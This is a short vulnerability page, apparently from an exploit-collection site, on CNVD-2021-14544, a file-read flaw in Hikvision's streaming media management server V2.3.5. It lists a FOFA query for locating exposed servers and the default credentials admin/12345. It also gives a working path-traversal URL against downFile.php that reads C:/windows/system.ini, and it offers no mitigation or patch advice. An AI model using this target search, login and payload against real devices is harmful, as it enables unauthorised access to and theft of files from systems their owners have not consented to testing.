# CNVD-2021-14544 HIKVISION 流媒體管理服務器 後台任意文件讀取漏洞/zh-hant
==漏洞影響==
杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2.3.5
==FOFA==
FOFA:title="流媒体管理服务器"
==默認登錄信息==
admin/12345
==POC==
http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
成功讀取 C:/windows/system.ini
==參考==
https://mp.weixin.qq.com/s/bnXxGWs0ft0G6Qcdlf9BDw
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容